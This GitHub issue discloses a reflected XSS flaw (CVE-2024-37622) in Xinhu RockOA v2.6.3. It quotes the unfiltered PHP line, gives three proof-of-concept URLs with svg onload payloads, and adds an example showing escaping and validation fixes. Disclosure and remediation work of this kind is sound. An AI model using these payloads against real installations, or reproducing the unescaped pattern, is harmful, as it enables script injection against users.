rainrocka / xinhu

Xinhu: a free and open-source office OA system, including a mobile app, a PC desktop client, REIM instant messaging and the server side, so that every enterprise and organization can have its own office system.
http://www.rockoa.com/

Reflected XSS Vulnerability in Xinhu RockOA v2.6.3 #4

Open Hebing123 opened 1 month ago

Hebing123 commented 1 month ago

Summary

A Reflected Cross-Site Scripting (XSS) vulnerability has been identified in the Xinhu RockOA v2.6.3.

Details

The XSS vulnerability originates from /webmain/model/flow/flow.php:

```php
if(!$this->moders)$this->echomsg('模块['.$num.']不存在,请到[流程模块列表]下添加'); }
```

https://github.com/rainrocka/xinhu/blob/7a6debc029c7332756cc3cc75c7faba69639eb89/webmain/model/flow/flow.php#L8

Since $num is not filtered, this leads to an XSS vulnerability across multiple endpoints.

Proof of Concept (PoC)

http(s)://ip:port/index.php?a=getselectdata&act=city:citydata&actstr=Y2l0eTpjaXR5ZGF0YQ::&acttyle=act&ajaxbool=true&d=flow&limit=100&m=mode_customer%7Cinput&page=1&rnd=969497&sysmid=0&sysmodenum=customer%3Csvg%20onload=alert(1)%3E

...

http(s)://ip:port/task.php?a=p&callback=&mid=5&num=finfybx%3Csvg/onload=alert(1)%3E

...

http(s)://ip:port/?a=lu&callback=homebsbianjback&d=flow&m=input&mid=0&num=bianjian%3Csvg%20onload=alert(1)%3E

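As an added illustration (not code from the xinhu repository; the message helper, the English message text and the `$_GET['num']`-style input source are assumptions), here is the pattern the issue describes beside two hardened forms: escaping the module name at the output boundary, and rejecting names outside the expected character set at the input boundary.

```php
<?php
// Added example, not the xinhu project's code. It models the pattern in the issue:
// a request-controlled module name ($num) is concatenated into an error message
// that is written into the HTML response without escaping.

// Constructed sample input, shaped like the value in the issue's PoC URL.
$num = 'finfybx<svg/onload=alert(1)>';

// Vulnerable shape: $num reaches the page verbatim, so any markup in it is
// rendered by the browser instead of being displayed as text.
function echomsg_unsafe(string $num): string
{
    return 'Module [' . $num . '] does not exist, please add it under [Flow module list]';
}

// Hardened shape 1: escape at the output boundary. Every HTML metacharacter in
// $num becomes an entity, so the browser shows the text rather than executing it.
function echomsg_safe(string $num): string
{
    $safe = htmlspecialchars($num, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return 'Module [' . $safe . '] does not exist, please add it under [Flow module list]';
}

// Hardened shape 2: validate at the input boundary. A flow module identifier is
// assumed to be a short alphanumeric token, so anything else is refused before
// it is used in a message or a module lookup. Both layers together are preferable
// to either alone.
function is_valid_module_num(string $num): bool
{
    return preg_match('/^[A-Za-z0-9_]{1,64}$/', $num) === 1;
}

echo 'unsafe: ' . echomsg_unsafe($num) . PHP_EOL;
echo 'safe:   ' . echomsg_safe($num) . PHP_EOL;
echo 'valid:  ' . var_export(is_valid_module_num($num), true) . PHP_EOL;
```

Running the script with `php` prints the raw tag in the unsafe line, the entity-encoded form in the safe line and `false` for the validity check, which is the behaviour a fix for this issue should produce.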

Hebing123 commented 1 week ago

CVE-2024-37622